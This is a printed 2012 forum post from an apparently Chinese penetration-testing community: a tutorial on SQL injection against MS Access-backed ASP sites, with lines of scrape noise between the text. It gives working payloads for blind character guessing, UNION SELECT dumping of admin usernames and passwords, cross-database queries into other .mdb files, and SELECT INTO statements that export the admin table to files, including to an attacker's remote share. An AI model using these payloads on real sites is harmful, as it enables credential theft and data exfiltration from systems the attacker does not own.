中国网络渗透测试联盟

标题: Access高级注入语句 [打印本页]

作者: admin    时间: 2012-9-15 14:20
标题: Access高级注入语句
--------------------------------------------------------------3 J4 |& R* j6 p0 |0 o6 h
union查询法! X" H% a4 j6 y2 g9 ?
首先要说的就是查询办法,一般的查询办法就是' z7 O2 f8 ?9 o; b# b
/ V. q3 j2 f8 u2 s& _7 b1 A
程序代码
: T$ C1 v  R1 Q. Q3 I  K; W: d( `and 1=(select count(*) from admin where left(id,1)='1'), N. p- ?" |; d' `: ]& q& z4 y( {

, W7 h; Q' U( Y; j+ R这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
2 A* K( {4 N5 p/ g; B所以这个时候,union select横空出现.别以为只能在PHP里用哦...- m' Z7 U. A7 b3 G. h9 @9 @0 J
譬如你有一个ACCESS点:+ w% u# L  ~+ ]) X! t( k
程序代码
9 N" o) a+ V5 ?: rhttp://bbs.tian6.com/xiaoyang.asp?coder=19 M( ]# X4 c1 U" T
. T9 ^' }. i" e
知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),9 n- r' |! `: H1 U! t9 n& a  C
然后我们直接来:
. w0 ?2 T# X3 W  _, t. ?7 W- h* N8 ^程序代码
' r1 D  R: D9 _http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)], ]. F: d) k2 `

/ Z5 ~0 t# h4 k9 X( a! G8 v7 L这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
  p* k+ ~; L: T3 z$ u/ n9 \6 c" P& P2 w, H$ n$ H/ U  k" W

; I+ f! l6 i# b) [
4 [, _4 w' s0 p' R( Z---------------------------------------------------------------1 Q6 f( v0 q! f/ S. f
Access跨库查询
& b  A+ o# N! w. ?8 f' _有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.0 R, Q, _5 t' p
跨库的查询语句:1 e8 ^* |/ d2 s
子查询:& I0 A! V/ B: W/ U
程序代码, ^: k- n$ U  t. f. U8 @; K" T
and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0/ c$ C5 H9 m; H- i+ N$ h

( A( Q0 |8 ~1 E, ~% o/ \7 a6 f! Vunion查询:
. ]3 t5 S. q9 p1 P2 _; t程序代码& n, p/ L3 \* E8 T  M( q
union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=16 ?! ~# v+ k1 m2 @$ p

! y8 a) ?: f9 a' C跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:6 ?. W% d1 i# W! y# F
程序代码
1 o; m9 a! U! J/ C3 o, N! Xhttp://www.4ngel.net/article/46.htm ' H* \4 R7 x/ b. G5 r  A
http://hf110.com/Article/hack/rqsl/200502/66.html& j  F0 O4 h) Z" I+ ^+ X
$ n/ D& Z, k. O2 V- D+ Y
---------------------------------------------------------------
2 R! i  H1 v9 `Access注入,导出txt,htm,html
+ h. d8 H7 [4 ^- t! ~7 \子查询语句:
4 u6 v0 h  \+ J9 s( I3 q8 i  W/ W程序代码- D7 `2 _# e5 C2 E9 J* ?9 L% p
Select * into [test.txt] in 'd:\web\' 'text;' from admin8 N! J4 B9 ~  g* D. Z# P- n
% O& Q% \6 t& Q% C
这样就把admin表的内容以test类型存进了d:\web里面.3 D  |3 u/ m2 k- |% Z$ j
UNION查询:5 U+ c" @, |$ r" A3 x& J1 W
程序代码
+ O+ @* l. ~+ V2 i4 R' {3 zunion select * into [admin.txt] in 'c:\' 'test;' from admin/ v+ V; m' c, Q$ ~1 o+ O0 B4 a
8 n# t$ S; a; j
而且这里也可以保存到本地来:8 x4 F1 ]% X7 x8 C1 [# _
程序代码( ]& N( m/ }7 o' V  _" c
Select * into [test.txt] in '\\yourip\share' 'text;' from admin* y$ J  }! d  m; f" H
8 N8 x: Y; ~: X; d! W, U
不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:5 ?* ?  G* Q2 Y7 E$ b7 U7 |. g0 ^3 z! Q

) z( V* l- G8 J/ h' }: p% t程序代码
; A3 a( \1 f4 z: M. }: j2 B: Ehttp://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
, b" b: ^% M2 o5 J! Q9 Y  u1 G! I' T, N
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.! x/ M1 q& S& N4 O: @





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2